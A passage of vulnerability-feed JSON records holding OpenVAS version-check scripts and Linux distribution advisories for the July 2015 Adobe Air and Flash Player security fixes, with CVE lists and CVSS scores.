75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-09 11:35:12 +0530 (Thu, 09 Jul 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities-01 July15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 18.0.0.180 on\n Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 18.0.0.180\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air/Win/Installed\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"18.0.0.180\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"18.0.0.180\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:04", "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-09T00:00:00", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805912", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805912", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_jul15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805912\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-09 11:41:16 +0530 (Thu, 09 Jul 2015)\");\n script_name(\"Adobe Air Multiple Vulnerabilities-01 July15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Air versions before 18.0.0.180 on\n Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Air version 18.0.0.180\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Air/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/air\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!airVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:airVer, test_version:\"18.0.0.180\"))\n{\n report = 'Installed version: ' + airVer + '\\n' +\n 'Fixed version: ' + \"18.0.0.180\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:58", "description": "Mageia Linux Local Security Checks mgasa-2015-0273", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0273", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130105", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130105", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0273.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130105\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:45 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0273\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.481 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0273.html\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0273\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.481~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:14", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805903", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805903\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:22:46 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version\n 13.0.0.302, and 14.x through 18.x before 18.0.0.203 versions on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.302 or 18.0.0.203 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"13.0.0.302\"))\n{\n fix = \"13.0.0.302\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"18.0.0.202\"))\n{\n fix = \"18.0.0.203\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:09", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805902", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805902", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805902\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:07:29 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player before version\n 13.0.0.302, and 14.x through 18.x before 18.0.0.203 versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.302 or 18.0.0.203 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"13.0.0.302\"))\n{\n fix = \"13.0.0.302\";\n VULN = TRUE;\n}\n\nif(version_in_range(version:playerVer, test_version:\"14.0\", test_version2:\"18.0.0.202\"))\n{\n fix = \"18.0.0.203\";\n VULN = TRUE;\n}\n\nif(VULN)\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "altlinux": [{"lastseen": "2022-06-10T03:07:00", "description": "3:11-alt47 built July 8, 2015 Sergey V Turchin in task [#146142](<https://git.altlinux.org/tasks/146142/>) \n--- \nJuly 8, 2015 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2014-0578, CVE-2015-3097, CVE-2015-3114, CVE-2015-3115,\n CVE-2015-3116, CVE-2015-3117, CVE-2015-3118, CVE-2015-3119,\n CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-3123,\n CVE-2015-3124, CVE-2015-3125, CVE-2015-3126, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131,\n CVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4429,\n CVE-2015-4430, CVE-2015-4431, CVE-2015-4432, CVE-2015-4433,\n CVE-2015-5116, CVE-2015-5117, CVE-2015-5118, CVE-2015-5119\n", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package adobe-flash-player version 3:11-alt47", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "2E7656C2D162693D3FA461626B8B7455", "href": "https://packages.altlinux.org/en/p7/srpms/adobe-flash-player/1874153338441013080", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-10T03:07:25", "description": "3:11-alt47 built July 8, 2015 Sergey V Turchin in task [#146143](<https://git.altlinux.org/tasks/146143/>) \n--- \nJuly 8, 2015 Sergey V Turchin \n \n \n - new version\n - security fixes:\n CVE-2014-0578, CVE-2015-3097, CVE-2015-3114, CVE-2015-3115,\n CVE-2015-3116, CVE-2015-3117, CVE-2015-3118, CVE-2015-3119,\n CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-3123,\n CVE-2015-3124, CVE-2015-3125, CVE-2015-3126, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3130, CVE-2015-3131,\n CVE-2015-3132, CVE-2015-3133, CVE-2015-3134, CVE-2015-3135,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4429,\n CVE-2015-4430, CVE-2015-4431, CVE-2015-4432, CVE-2015-4433,\n CVE-2015-5116, CVE-2015-5117, CVE-2015-5118, CVE-2015-5119\n", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 6 package adobe-flash-player version 3:11-alt47", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 